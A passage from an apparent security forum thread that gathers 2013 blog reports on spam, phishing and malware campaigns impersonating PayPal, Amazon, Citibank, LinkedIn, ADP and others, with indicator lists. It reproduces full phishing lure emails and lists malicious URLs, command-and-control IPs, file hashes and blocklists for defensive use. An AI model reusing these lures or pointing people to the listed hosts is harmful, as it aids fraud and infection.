While the user is reading the message, Ramnit connects to its command and control server and obtains the details of a designated mule account. This is followed by the initiation of a wire transfer to the money mule. But, there is still one more obstacle in the way of the malware – to complete the transaction a One Time Password (OTP) must be entered by the user. To overcome this requirement Ramnit displays the following message:
> https://www.net-security.org/images/articles/trusteer-042013-3.jpg
The temporary receiver number in the message is in fact the mule’s account number. The user then receives the SMS and thinking that he must complete the “OTP service generation”, enters their OTP. By entering the OTP, the user unknowingly enables the malware to complete the fraudulent transaction and finalize the payment to the mule account. This is yet another example of how well designed social engineering techniques help streamline the fraud process... the authors most likely used ‘find and replace’ to switch the two words that resulted in the grammatical mistake “a option.” Nevertheless, by changing multiple entries in the FAQ section Ramnit* demonstrates that its authors did not leave anything to chance – even if the victim decides to go the extra step, Ramnit is already there..."
* http://www.trusteer.com/blog/ramnit-evolution-%E2%80%93-worm-financial-malware
___
Malicious PDFs on the rise
- http://blog.trendmicro.com/trendlabs-security-intelligence/malicious-pdfs-on-the-rise/
Apr 29, 2013 - "... we continue to see CVE-2012-0158 in heavy use, we have noticed increasing use of an exploit for Adobe Reader (CVE-2013-0640)... files used dnsport.chatnook .com, inter.so-webmail .com, and 223.25.242.45 as their command-and-control servers... Our research indicates that attackers engaged in APT campaigns may have adapted the exploit made infamous by the MiniDuke campaign and have incorporated it into their arsenal. At the same time, we have found that other APT campaigns seem to have developed their own methods to exploit the same vulnerability. The increase in malicious PDF’s exploiting CVE-2013-0640 may indicate the start of shift in APT attacker behavior away from using malicious Word documents that exploit the now quite old CVE-2012-0158."
(More detail at the trendmicro URL above.)
- https://blogs.technet.com/b/mmpc/archive/2013/04/29/the-rise-in-the-exploitation-of-old-pdf-vulnerabilities.aspx?Redirected=true
29 Apr 2013
Graph: https://www.microsoft.com/security/portal/blog-images/pdf_exploits/2.png
___
Phish target Apple IDs
- http://blog.trendmicro.com/trendlabs-security-intelligence/hackers-to-manage-your-apple-id-if-caught-from-phishing-bait/
Apr 30, 2013 - "Phishers appear to have concentrated their fire on a relatively new target: Apple IDs. In recent days, we’ve seen a spike in phishing sites that try to steal Apple IDs... Technically, the sites were only compromised, but not hacked (as the original content was not modified). It’s possible, however, that the sites may be hacked or defaced if the site stays compromised... the directory contains pages that spoof the Apple ID login page fairly closely:
> http://blog.trendmicro.com/trendlabs-security-intelligence/files/2013/04/fake_apple.jpg
We’ve identified a total of 110 compromised sites, all of hosted at the IP address 70.86.13.17, which is registered to an ISP in the Houston area. Almost all of these sites have not been cleaned:
> http://blog.trendmicro.com/trendlabs-security-intelligence/files/2013/04/chart.png
The graph above shows the increase in phishing sites targeting Apple IDs. We’ve seen attacks targeting not only American users, but also British and French users. Some versions of this attack ask not only for the user’s Apple ID login credentials, but also their billing address and other personal and credit card information. It will eventually result in a page that states that access has been restored, but of course the information has been stolen. One can see in the sample page below how it asks for credit card information:
> http://blog.trendmicro.com/trendlabs-security-intelligence/files/2013/04/apple_credit_card.jpg
Users may be redirected to these phishing sites via spam messages that state that the user’s account will expire unless their information is subject to an “audit”, which not only gets users to click on the link, it puts them in a mindset willing to give up information.
> http://blog.trendmicro.com/trendlabs-security-intelligence/files/2013/04/apple_mail.jpg
One way to identify these phishing sites, is that the fake sites do not display any indications that you are at a secure site (like the padlock and “Apple Inc. ” part of the toolbar), which you can see in this screenshot of the legitimate site:
> http://blog.trendmicro.com/trendlabs-security-intelligence/files/2013/04/legitsite.jpg
The screenshot above is from Chrome, but Internet Explorer and Firefox both have similar ways to indicate secure sites. For the phishing messages themselves, legitimate messages should generally have matching domains all around – where they were sent from, where any links go to, etcetera. Mere appearance of the email isn’t enough to judge, as very legitimate-looking emails have been used maliciously. We also encourage users to enable the two-factor authentication that Apple ID recently introduced, for added protection..."
___
Something evil on 96.126.108.132
- http://blog.dynamoo.com/2013/04/something-evil-on-96126108132.html
30 April 2013 - "These sites are on (or are likely to be created on) 96.126.108.132 (Linode, US) which is a known malware server [1] [2] [3]. Blocking this IP would be wise. Some of the domains are rather.. unusual ;) ..."
(Long list at the dynamoo URL above.)
1) https://www.virustotal.com/en/ip-address/96.126.108.132/information/
2) https://palevotracker.abuse.ch/?ipaddress=96.126.108.132
3) http://support.clean-mx.de/clean-mx/viruses.php?sort=firstseen%20desc&review=96.126.108.132
___
Fake "Requested Reset of Yoyr PayPal Password" SPAM / frustrationpostcards .biz
- http://blog.dynamoo.com/2013/04/requested-reset-of-yoyr-paypal-password.html
29 Apr 2013 - "This [u]fake PayPal spam leads to malware on frustrationpostcards .biz:
Date: Mon, 29 Apr 2013 13:22:03 -0500
From: "service @paypalmail .com" [chichisaq0 @emlreq.paypalmail .com]
Subject: Requested Reset of Yoyr PayPal Password
Your account will stay on hold untill password reset.
How to reset your PayPal password
Hello [redacted],
To get back into your PayPal account, you'll have to create a new password.
It's easy:
Click the link below to open a secure browser window.
Confirm that you're the owner of the account, and then follow the instructions.
Reset your password now
If you didn't requested help with your password, let us know immediately. Reporting it is important because it helps us prevent fraudsters from stealing your information.
Help Center | Security Center
Please don't reply to this email. It'll just confuse the computer that sent it and you won't get a response.
Copyright © 2013 PayPal, Inc. All rights reserved. PayPal is located at 2211 N. First St., San Jose, CA 95132.
PayPal Email ID 2A7X1
The link goes through a legitimate but hacked site to land on a malicious payload at [donotclick]frustrationpostcards .biz/news/institutions-trusted.php (report here*) hosted on the following IPs:
82.236.38.147 (PROXAD Free SAS, France)
83.212.110.172 (Greek Research and Technology Network, Greece)
130.239.163.24 (Umea University, Sweden)...
Blocklist:
82.236.38.147
83.212.110.172
130.239.163.24 ..."
* http://urlquery.net/report.php?id=2230181
Screenshot: https://www.net-security.org/images/articles/pp-fake-30042013.jpg
___
Fake Wire Transfer SPAM / Payment reeceipt.exe / 78.139.187.6
- http://blog.dynamoo.com/2013/04/your-wire-transfer-82932922-canceled.html
30 Apr 2013 - "This fake wire transfer spam comes with a malicious attachment:
Date: Tue, 30 Apr 2013 15:27:44 -0500 [16:27:44 EDT]
From: Federal Reserve [alerts @federalreserve .gov]
Subject: Your Wire Transfer 82932922 canceled
The Wire transfer , recently sent from your bank account , was not processed by the FedWire.
Transfer details attached to the letter.
This service is provided to you by the Federal Reserve Board. Visit us on the web at website
To report this message as spam, offensive, or if you feel you have received this in error, please send e-mail to email address including the entire contents and subject of the message. It will be reviewed by staff and acted upon appropriately
In this case there is an attachment PAYMENT RECEIPT 30-04-2013-GBK-75.zip which contains a malicious executable crafted to look like a Word document called Payment reeceipt.exe . This executable has a so-so VirusTotal detection rate of 29/46*.
The malware has the following checksums according to Comodo CAMAS**:
Size 371712
MD5 0a3723483e06dcf7e51073972b9d1ef3
SHA1 293735a9fdc7e786b12c2ef92f544ffc53a0a0e7
SHA256 0eb5dd62e32bc6480bae638967320957419ba70330f0b9ad5759c2d3f25753dd
Anubis has a pretty detailed report*** of what this malware does. In particular, you might want to monitor network traffic to and from 78.139.187.6 (Caucasus Online, Georgia) which seems to be a C&C server. This IP has also been seen here****. There are several other IPs involved, but these look like DSL subscribers with dynamic address, so probably a part of a botnet. For the sake of completeness they are:
64.231.249.250
69.183.226.70
78.139.187.6
81.133.189.232
123.237.234.67 ...."
* https://www.virustotal.com/en/file/0eb5dd62e32bc6480bae638967320957419ba70330f0b9ad5759c2d3f25753dd/analysis/1367354089/
File name: Payment reeceipt.exe
Detection ratio: 29/46
Analysis date: 2013-04-30
** http://camas.comodo.com/cgi-bin/submit?file=0eb5dd62e32bc6480bae638967320957419ba70330f0b9ad5759c2d3f25753dd
*** http://anubis.iseclab.org/?action=result&task_id=11c3b00f56c0bd214cda8762fb407b4fd&format=html
**** http://blog.dynamoo.com/2013/04/fiserv-secure-email-notification-spam.html
:mad: :sad:
AplusWebMaster
2013-05-04, 04:56
FYI...
Malicious ADP Delivery Notice Spam
- http://threattrack.tumblr.com/post/49528975188/malicious-adp-delivery-notice-spam
3 May 2013 - "Subjects Seen:
ADP Chesapeake - Package Delivery Confirmation
Typical e-mail details:
This message is to notify you that your package has been processed and is on schedule for delivery from ADP.
Here are the details of your delivery:
Package Type: QTR/YE Reporting
Courier: UPS Ground
Estimated Time of Arrival: Monday, 1:00pm
Tracking Number (if one is available for this package): [removed]
Details: Click here to overview and/or modify order
We will notify you via email if the status of your delivery changes.
Access these and other valuable tools at support.ADP.com:
Payroll and Tax Calculators
Order Payroll Supplies, Blank Checks, and more
Submit requests online such as SUI Rate Changes, Schedule Changes, and more
Download Product Documentation, Manuals, and Forms
Download Software Patches and Updates
Access Knowledge Solutions / Frequently Asked Questions
Watch Animated Tours with Guided Input Instructions
Thank You,
ADP Client Services
support.ADP .com
Malicious URLs
technotkan .kz/templates/ja_purity_ii/adp_dpack.html
sub.mumbailocaltraintimetable .net/ensure/indeed-called_risk_omits.php
sub.mumbailocaltraintimetable .net/ensure/indeed-called_risk_omits.php?hyobrlhz=kniez&vvhxv=nle
sub.mumbailocaltraintimetable .net/ensure/indeed-called_risk_omits.php?df=1g:1i:2v:32:1f&ne=1g:2w:2w:1h:1g:1j:1l:1h:2v:30&h=1f&ug=q&tr=s&jopa=3366088
Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/212eabee867edfdd16b53ce71693226a/tumblr_inline_mm8lqafPsL1qz4rgp.png
___
Something evil on 173.255.200.91
- http://blog.dynamoo.com/2013/05/something-evil-on-17325520091.html
3 May 2013 - "173.255.200.91 (Linode, US) is exhibiting the characteristics of the Neutrino Exploit kit* [see URLquery** and VirusTotal reports***). Attempts to analyse the malware seem to be generating 404 errors, but this could simply be a defensive mechanism by the malware on the server. I can see... domains on the server, ones flagged by Google for malware... I would recommend blocking all domains on this server... or simply block the IP address..."
* http://malware.dontneedcoffee.com/2013/03/hello-neutrino-just-one-more-exploit-kit.html
** http://urlquery.net/search.php?q=173.255.200.91&type=string&start=2013-04-18&end=2013-05-03&max=50
*** https://www.virustotal.com/en/ip-address/173.255.200.91/information/
___
Malicious US Airways Spam
- http://threattrack.tumblr.com/post/49457796251/malicious-us-airways-spam
2 May 2013 - "Subjects Seen:
US Airways online check-in.
Typical e-mail details:
You can check in from 24 hours and up to 60 minutes before your flight (2 hours if you’re flying internationally). After that, all you need to do is print your boarding pass and go to the gate.
Malicious URLs
concaribe .com/images/wp_pageid.html?id=516047FC45UOYFC8AVC60VIQ
yob.newwaysys .com/ensure/origin-want_require.php?jnlp=e3ca9e7968
yob.newwaysys .com/ensure/origin-want_require.php?bnddxr=nlbaicu&zvgibtad=tqu
yob.newwaysys .com/ensure/origin-want_require.php?qf=1i:1f:32:33:2v&ge=32:1i:30:2v:1o:32:1m:1o:1l:1n&i=1f&wl=j&rw=r&jopa=2959383
Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/233967e8d27c43917399012d925b29e7/tumblr_inline_mm6uluilQn1qz4rgp.png
___
Malicious Citibank Paymentech Attachment Spam
- http://threattrack.tumblr.com/post/49449018003/malicious-citibank-paymentech-attachment-spam
2 May 2013 - "Subjects Seen:
Merchant Statement
Typical e-mail details:
" Attached is your Citibank Paymentech electronic Merchant Billing Statement. If you need help, please contact your Account Executive or call Merchant Services at the telephone number listed on your statement. PLEASE DO NOT RESPOND BY USING REPLY. This email is sent from an unmonitored email address, and your response will not be received by Citibank Paymentech. Citibank Paymentech will not be responsible for any liabilities that may result from or relate to any failure or delay caused by Citibank Paymentech’s or the Merchant’s email service or otherwise. Citibank Paymentech recommends that Merchants continue to monitor their statement information regularly. ————— Learn more about Citibank Paymentech Solutions, LLC payment processing services at citibank.com. ————— THIS MESSAGE IS CONFIDENTIAL. This e-mail message and any attachments are proprietary and confidential information intended only for the use of the recipient(s) named above. If you are not the intended recipient, you may not print, distribute, or copy this message or any attachments. If you have received this communication in error, please notify the sender by return e-mail and delete this message and any attachments from your computer.
Malicious URLs
Spam contains a malicious attachment.
Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/47ea01968b479374fc6a4331248614b0/tumblr_inline_mm6o3sSQsp1qz4rgp.png
___
Fake LinkedIn SPAM / guessworkcontentprotect .biz
- http://blog.dynamoo.com/2013/05/linkedin-spam-guessworkcontentprotectbiz.html
2 May 2013 - "This fake LinkedIn email leads to malware on guessworkcontentprotect .biz:
From: LinkedIn Invitations [giuseppeah5 @mail.paypal .com]
Date: 2 May 2013 16:49
Subject: LinkedIn inviation notificaltion.
LinkedIn
This is a note that on May 2, Lewis Padilla sent you an invitation to join their professional network at LinkedIn.
Accept Lewis Padilla Invitation
On May 2, Lewis Padilla wrote:
> To: [redacted]
> I'd like to join you to my professional network on LinkedIn.
> Lewis Padilla
You are receiving Reminder emails for pending invitations. Unsubscribe.
© 2013 LinkedIn Corporation. 2029 Stierlin Ct, Mountain View, CA 94043, USA.
The malicious payload is at [donotclick]guessworkcontentprotect .biz/news/pattern-brother.php (report here*) hosted on:
82.236.38.147 (PROXAD Free SAS, France)
83.212.110.172 (Greek Research and Technology Network, Greece)
130.239.163.24 (Umea University, Sweden)
203.190.36.201 (Kementerian Pertanian, Indonesia)
Blocklist:
82.236.38.147
83.212.110.172
130.239.163.24
203.190.36.201 ..."
* http://urlquery.net/report.php?id=2293535
:mad::fear:
AplusWebMaster
2013-05-06, 20:26
FYI...
Mother’s Day SPAM ...
- http://www.symantec.com/connect/blogs/spammers-continue-exploit-mother-s-day
6 May 2013 - "... Spam messages related to Mother’s Day have begun flowing into the Symantec Probe Network. Clicking the URL contained in the spam message automatically -redirects- the recipient to a website containing a bogus Mother’s Day offer upon completion of a -fake- survey.
> https://www.symantec.com/connect/sites/default/files/users/user-1013481/mothers%201.png
Once the survey is completed, a page is then displayed asking the user to enter their personal information in order to receive the -bogus- offer.
> https://www.symantec.com/connect/sites/default/files/users/user-1013481/mothers%202.png
Next...
> https://www.symantec.com/connect/sites/default/files/users/user-1013481/mothers%203.png
... Symantec is observing an increase in spam volume related to Mother’s Day, which can be seen in the following graph.
> https://www.symantec.com/connect/sites/default/files/users/user-1013481/mothers%205.png
... use caution when receiving unsolicited or unexpected emails. We are closely monitoring Mother’s Day spam attacks to ensure that readers are kept up to date with information on the latest threats..."
- https://www.bbb.org/blog/2013/05/avoiding-mothers-day-email-scams/
May 6, 2013
- http://mashable.com/2013/05/01/mothers-day-email-scams/
2013-05-01
:fear::mad:
AplusWebMaster
2013-05-07, 12:20
FYI...
AutoIt malware - 188.161.9.226 ...
- http://blog.trendmicro.com/trendlabs-security-intelligence/autoit-used-to-spread-malware-and-toolsets/
May 6, 2013 - "... In addition to tools being found on sites like Pastebin and Pastie, we are also seeing a tremendous increase in the amount of malware utilizing AutoIt as a scripting language. One piece of malware that was found in the wild was particularly interesting. This malware is a variant of the popular DarkComet RAT – utilizing AutoIt. This variant runs a backdoor on the victim machine and communicates outbound to a nefarious host at shark18952012.no-ip .info (188.161.9.226 at the time of writing) over port 1604... In addition to this malware’s outbound communication, it also modifies the local software firewall policies to disable them, in addition to installing itself at startup for persistency... Upon execution of the malware, it immediately disables the Windows Firewall. After disabling the firewall, the malware then disables the ability to get into the registry of Windows to view or undo the changes performed... As scripting languages like AutoIt continue to gain popularity, we expect more of these types of malware to make a migration to using them. The ease of use and learning, as well as the ability to post code easily to popular dropsites make this a great opportunity for actors with nefarious intentions to propagate their tools and malware. We recommend continuing to update your Anti-Virus signatures as well as consider blocking access to Pastebin, Pastie and other code dropsites on your corporate network where applicable."
___
Something evil on 151.248.123.170 Part III
- http://blog.dynamoo.com/2013/05/something-evil-on-151248123170-part-iii.html
7 May 2013 - "I've covered 151.248.123.170 (Reg.ru, Russia*) a couple of times in the past month [1] [2], and it's still actively pushing out malware via dynamic DNS domains, many of which are injection attacks on hacked sites. There are hundreds or possibly thousands of malicious domains on this IP. Blocking them individually is likely to be problematic, the best approach is to block all traffic to 151.248.123.170 or to the Dynamic DNS domains involved.. although this might potentially block access to some legitimate sites..."
1) http://blog.dynamoo.com/2013/04/something-evil-on-151248123170_24.html
2) http://blog.dynamoo.com/2013/04/something-evil-on-151248123170.html
* https://www.google.com/safebrowsing/diagnostic?site=AS:39134
___
Fake Citibank ‘Merchant Billing Statement’ emails lead to malware
- http://blog.webroot.com/2013/05/07/citibank-merchant-billing-statement-themed-emails-lead-to-malware/
May 7, 2013 - "Over the past 24 hours, we’ve intercepted yet another spam campaign impersonating Citibank in an attempt to socially engineer Citibank customers into thinking that they’ve received a Merchant Billing Statement. Once users execute the malicious attachment found in the fake emails, their PCs automatically join the botnet operated by the cybercriminal/cybercriminals...
Sample screenshot of the spamvertised email:
> https://webrootblog.files.wordpress.com/2013/05/citibank_merchant_billing_statement_malware_malicious_software_social_engineering_botnet_botnets_trojan.png (https://webrootblog.files.wordpress.com/2013/05/citibank_merchant_billing_statement_malware_malicious_software_social_engineering_botnet_botnets_trojan.png)
Detection rate for the malicious executable: MD5: 75a666f81847ccf7656790162e6a666a * ... Trojan-Spy.Win32.Zbot.lcnn..."
(More detail at the webroot URL above.)
* https://www.virustotal.com/en/file/52dc5d89ed540061e4779b5c21c2c6be288aba9373271434157489c7addcdb03/analysis/1367618876/
File name: Kwmfd2.exe
Detection ratio: 33/46
Analysis date: 2013-05-05
:mad:
AplusWebMaster
2013-05-08, 12:25
FYI...
Fake Amazon.com SPAM / ehrap .net
- http://blog.dynamoo.com/2013/05/amazoncom-spam-ehrapnet.html
8 May 2013 - "This fake Amazon spam leads to malware on ehrap .net:
Date: Tue, 7 May 2013 22:54:26 +0100 [05/07/13 17:54:26 EDT]
From: "Amazon.com" [drudgingb50@m.amazonmail.com]
Subject: Your Amazon.com order confirmation.
Thanks for your order, [redacted]!
Did you know you can view and edit your orders online, 24 hours a day? Visit Your Account.
Order Information:
E-mail Address: [redacted]
Billing Address:
216 CROSSING CRK N
GAHANNA
United States
Phone: 1-747-289-5672
Order Grand Total: $ 53.99
Earn 3% rewards on your Amazon.com orders with the Amazon Visa Card. Learn More
Order Summary:
Details:
Order #: I12-4392835-6098844
Subtotal of items: $ 53.99
Total before tax: $ 53.99
Tax Collected: $0.00
Grand Total: $ 50.00
Gift Certificates: $ 3.99
Total for this Order: $ 53.99
The following item is auto-delivered to your Kindle or other device. You can view more information about this order by clicking on the title on the Manage Your Kindle page at Amazon.com.
Mockingjay (The Final Book of The Hunger Games) [Kindle Edition] $ 53.99
Sold By: Random House Digital, Inc.
Give Kindle books to anyone with an e-mail address - no Kindle required!
You can review your orders in Your Account. If you've explored the links on that page but still have a question, please visit our online Help Department.
Please note: This e-mail was sent from a notification-only address that cannot accept incoming e-mail. Please do not reply to this message.
Thanks again for shopping with us.
Amazon.com
Earth's Biggest Selection
Prefer not to receive HTML mail? Click here
The link in the email goes through a legitimate hacked site and ends up on [donotclick]ehrap .net/news/days_electric-sources.php (report here*) hosted on (or with nameservers on) the following IPs:
85.41.88.24 (Telecom Italia, Italy)
98.210.212.79 (Comcast, US)
140.121.140.92 (TANet, Taiwan)
178.175.140.185 (Trabia-Network, Moldova)
197.246.3.196 (The Noor Group, Egypt)
216.70.110.21 (Media Temple, US)
The domains involved indicate that this is the gang behind what I call the Amerika series of spam emails.
Blocklist:
85.41.88.24
98.210.212.79
140.121.140.92
178.175.140.185
197.246.3.196
216.70.110.21 ..."
* http://urlquery.net/report.php?id=2377955
___
Fake AV and ransomware combo
- https://www.net-security.org/malware_news.php?id=2486
8 May 2013 - "Ransomware and fake antivirus solutions are well-known threats, but a deadly fraudulent combination of the two has been recently spotted... The software - dubbed "Secure Bit" - first tries to convince the victims that the "security level" of their computer is low and instructs them to call for support so that the “threats” it has "found" can be removed. The claim is accompanied with a pop-ups that lists a great number of them. But if the victims don't do as they are told after a period of time, the fake AV turns nasty (well, nastier), and locks the computer screen. The victims can't do anything on their machine, and they are again told to contact the given phone number in order to regain control of it. The phone call reveals that it will cost the victims $49.99 to do that, and Total Defense's Tsahi Carmona warns* that many users may not recognize it's a scam and may pay the ransom..."
* http://www.totaldefense.com/blogs/2013/05/07/newfake-anti-virus-secure-bit.aspx
"... This anti-virus software pretender combines two methods of fraud – the fake anti-virus software and a malware that supposedly locks the screen in order to make the victim pay money to unlock. After the user installs this free “anti-virus” software it immediately notifies that the security level of the computer is low and which they need to call for support to address the found “threats”..."
___
Fake Amazon emails lead to malware...
- http://blog.webroot.com/2013/05/08/fake-amazon-your-kindle-e-book-order-themed-emails-circulating-in-the-wild-lead-to-client-side-exploits-and-malware/
May 8, 2013 - "... Cybercriminals are currently mass mailing tens of thousands of fake Amazon “You Kindle E-Book Order” themed emails in an attempt to trick Kindle users into clicking on the malicious links found in these messages. Once they do so, they’ll be automatically exposed to the client-side exploits served by the Black Hole Exploit Kit, ultimately joining the botnet operated by the cybercriminal/cybercriminals that launched the campaign...
Sample screenshot of the spamvertised email:
> https://webrootblog.files.wordpress.com/2013/05/amazon_kindle_ebook_order_fake_email_malware_malicious_software_spam_spamvertised_social_engineering.png?w=650&h=486
... MD5 for the Java exploit: MD5: c9bc87eef8db72f64bac0a72f82b04cf * ... HEUR:Exploit.Java.CVE-2012-0507.gen
MD5 for the PDF exploit: MD5: 53c90140fde593713efe6298547ff205 ** ...Exploit:Win32/CVE-2010-0188
Upon successful client-side exploitation, the campaign drops MD5: 330ad00466bd44a5fb2786f0f5e2d0da *** ...Trojan.Win32.Reveton.a (v).
... phones back to:
85.214.143.90
130.79.80.40
213.199.201.180
46.51.189.229
91.121.30.185
89.110.148.213
81.17.22.14
88.119.156.20
161.53.184.3
94.23.6.95
88.191.130.98 /J9/vp/EGa+AAAAAA/2MB9vCAAAA ..."
(More detail at the webroot URL above.)
* https://www.virustotal.com/en/file/68b33b489044b0ebfe9b856219cd5c097050cfb48b610dcefeb06876647043b0/analysis/1367968246/
File name: days_electric-sources.php
Detection ratio: 5/46
Analysis date: 2013-05-07
** https://www.virustotal.com/en/file/ff12998983a0a3a753aa808b3d635ddafaf555fb18e4b7fcc35b9087cc6b534f/analysis/1367968346/
File name: Kindle.pdf
Detection ratio: 26/46
Analysis date: 2013-05-07
*** https://www.virustotal.com/en/file/150872022d30ede70f0d959b671281d44b55883a229e07dd0bdcf33a0a827274/analysis/
File name: sndrec32.exe
Detection ratio: 16/46
Analysis date: 2013-05-08
___
Malicious Better Business Bureau Spam
- http://threattrack.tumblr.com/post/49947201132/malicious-better-business-bureau-spam
8 May 2013 - "Subjects Seen:
Better Business Beareau Complaint ID [removed]
Typical e-mail details:
The Better Business Bureau has been entered the above mentioned complaint from one of your users in regard to their business contacts with you. The information about the consumer’s concern are available at the link below. Please give attention to this point and notify us about your belief as soon as possible.
We kindly ask you to open the RECLAMATION REPORT to answer on this claim.
We are looking forward to your prompt response.
WBR
Colton Reed
Dispute Advisor
Better Business Bureau
Malicious URLs
stopwulgaryzmom .pl/bbb_view_compl.html?complain=DFMI30GA2_80VJA8
pub.mumbailocaltraintimetable .net/ensure/misuse-restrict-systems_properties.php
Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/7a1dafe59a95df30f857c5986a835646/tumblr_inline_mmht3xfiSm1qz4rgp.png
:fear: :mad:
AplusWebMaster
2013-05-09, 16:19
FYI...
Fake Citibank SPAM / Statement ID 64775-4985.doc
- http://blog.dynamoo.com/2013/05/citibank-spam-statement-id-64775-4985doc.html
9 May 2013 - "This fake Citibank spam contains a malicious Word document that leads to malware.
Date: Thu, 9 May 2013 01:22:21 +0200 [05/08/13 19:22:21 EDT]
From: CITIBANK [noreply @citybank .com]
Subject: Merchant Statement
Enclosed DOC is your Citibank Paymentech electronic Merchant Billing Statement. If you need help, please contact your Account Executive or call Merchant Services at the telephone number listed on your statement. PLEASE DO NOT RESPOND BY USING REPLY. This email is sent from an unmonitored email address, and your response will not be received by Citibank Paymentech. Citibank Paymentech will not be responsible for any liabilities that may result from or relate to any failure or delay caused by Citibank Paymentech's or the Merchant's email service or otherwise. Citibank Paymentech recommends that Merchants continue to monitor their statement information regularly. ---------- Learn more about Citibank Paymentech Solutions, LLC payment processing services at Citibank. ---------- THIS MESSAGE IS CONFIDENTIAL. This e-mail message and any attachments are proprietary and confidential information intended only for the use of the recipient(s) named above. If you are not the intended recipient, you may not print, distribute, or copy this message or any attachments. If you have received this communication in error, please notify the sender by return e-mail and delete this message and any attachments from your computer.
The attached document Statement ID 64775-4985.doc contains an exploit (analysis pending) with a VirusTotal detection rate of just 10/46*. It appears to exploit a flaw in the RTF converter... making sure that your copy of Microsoft Office is up-to-date and fully patched will help to mitigate against this sort of threat."
* https://www.virustotal.com/en/file/2cf2fbe92004b98b8dd5ff4631787dcf8241723020f1216b89a1a706addf9347/analysis/
File name: Statement ID 64775-4985.doc
Detection ratio: 10/46
Analysis date: 2013-05-09
Update: another version is using the filename Statement ID 4657-345-347-0332.doc. It looks like it is exploiting CVE-2012-0158* aka MS12-027.
* https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2012-0158 - 9.3 (HIGH)
Last revised: 03/07/2013
___
Fake Traffic Ticket serves malware
- http://blog.webroot.com/2013/05/09/cybercriminals-impersonate-new-york-states-department-of-motor-vehicles-dmv-serve-malware/
9 May 2013 - "Cybercriminals are currently spamvertising tens of thousands of -bogus- emails impersonating New York State’s Department of Motor Vehicles (DMV) in an attempt to trick users into thinking they’ve received an uniform traffic ticket, that they should open, print and send to their town’s court. In reality, once users open and execute the malicious attachment, their PCs will automatically join the botnet operated by the cybercriminal/cybercriminals behind the campaign...
Sample screenshot of the spamvertised email:
> https://webrootblog.files.wordpress.com/2013/05/new_york_state_dmv_uniform_traffic_ticket_fake_email_spam_malware_malicious_software_social_engineering.png?w=423&h=290
Detection rate for the malicious executable: MD5: 247c67cb99922fd4d0e2ca5d6976fc29 * ... Trojan-Spy.Win32.Zbot.lhim..."
(More detail available at the webroot URL above.)
* https://www.virustotal.com/en/file/dae8aa7d95823779ae29f74571f42bf70bbb1e3a294842470c9f75f757ca43b1/analysis/
File name: Unihl.exe
Detection ratio: 30/45
Analysis date: 2013-05-08
:fear: :mad:
AplusWebMaster
2013-05-10, 15:06
FYI...
Malicious Facebook Friend Notification Spam
- http://threattrack.tumblr.com/post/50026329673/malicious-facebook-friend-notification-spam
9 May 2013 - "Subjects Seen:
[removed] wants to be friends on Facebook
Typical e-mail details:
[removed] wants to be friends with you on Facebook Facebook.
Malicious URLs
web.jen-pages .de/fbreq.html
job.bgita .ru/fbreq.html
yup.mumbailocaltraintimetable .net/ensure/specified_drop_similarly.php?jnlp=7ad5b52a64
yup.mumbailocaltraintimetable .net/ensure/specified_drop_similarly.php?zvvsj=edwwqnl&wit=tjm
yup.mumbailocaltraintimetable .net/ensure/specified_drop_similarly.php?mf=1i:1f:32:33:2v&le=1m:2v:31:1k:2w:1k:1h:2v:1l:1j&u=1f&yj=i&cp=j&jopa=5216591
Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/36bb654b369128a847231d5b86b7c58e/tumblr_inline_mmjo2ooht71qz4rgp.png
___
Something evil on 151.248.123.170, Part IV
- http://blog.dynamoo.com/2013/05/something-evil-on-151248123170-part-iv.html
10 May 2013 - "Here are some additional malicious domains from a very evil malware server on 151.248.123.170 (Reg.ru, Russia)... you can download a full list of everything that I can find here** [.txt]. This server is currently being used as the payload for injection attacks. Blocking the IP address is the obvious solution, or you could block the Dynamic DNS domains listed here*..."
* http://blog.dynamoo.com/2013/05/something-evil-on-151248123170-part-iii.html
** http://www.dynamoo.com/files/151-248-123-170.txt
___
USAA Credentials Phish
- http://threattrack.tumblr.com/post/50108697070/usaa-credentials-phish
10 May 2013 - "Subjects Seen:
Important Message From Usaa
Typical e-mail details:
Dear Valued Customer,
We have created new dedicated security servers to keep all our
online banking customers account safe and secure. This is server< /span>
has been tested,now we are asking all our online banking customers
to register for the new security server to keep them safe.
To register for this new security server quickly click on the button
below to complete registration immediately.
Click Here To Register
We hope you find our Internet Banking service easy and convenient to use.
Yours sincerely
USAA,
Digital Banking Director
Malicious URLs
sehyup .com/08_dev/board/file/bbs_notice/vi.htm
philanthropyexpert .org/ass/index.html
Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/f7ea6a1ae0534f4394386635bb0eb294/tumblr_inline_mmln1qLK0n1qz4rgp.png
:mad::mad:
AplusWebMaster
2013-05-13, 13:50
FYI...
Something evil on 188.241.86.33
- http://blog.dynamoo.com/2013/05/something-evil-on-1882418633.html
13 May 2013 - "188.241.86.33 (Megahost, Romania) is a malware server currently involved in injection attacks, serving up the Blackhole exploit kit, Zbot and a side order of Cdorked [1] [2]. This IP hosts a variety of domains, some of which are purely malicious, some of which are hijacked subdomains of legitimate ones. Blocking the IP address is the easiest approach..."
(More detail at the dynamoo URL above.)
1) http://urlquery.net/search.php?q=188.241.86.33&type=string&start=2013-04-28&end=2013-05-13&max=50
2) https://www.virustotal.com/en/ip-address/188.241.86.33/information/
___
Browser extension hijacks Facebook profiles
- https://blogs.technet.com/b/mmpc/archive/2013/05/10/browser-extension-hijacks-facebook-profiles.aspx?Redirected=true
10 May 2013 - "We have received reports about a wave of malicious browser extensions trying to hijack Facebook profiles. This threat was first discovered in Brazil. We detect it as Trojan:JS/Febipos.A. The malware is a malicious browser extension specifically targeting Chrome and Mozilla Firefox..."
- http://h-online.com/-1861398
13 May 2013 - "... The trojan extensions themselves monitor users' browser activity to see if they are logged into Facebook and then retrieve a configuration file from a site, disguised as a .php file, which contains commands for the extension. The extension is able to like pages, share pages, post, join groups, invite friends to groups, chat to friends or comment on posts... Microsoft recommends that users review their installed extensions..."
___
Fake BoA Paymentech Malicious Word Doc Attachment Spam
- http://threattrack.tumblr.com/post/50349361323/bank-of-america-paymentech-malicious-word-doc
13 May 2013 - "Subjects Seen:
BOA Merchant Statement
Typical e-mail details:
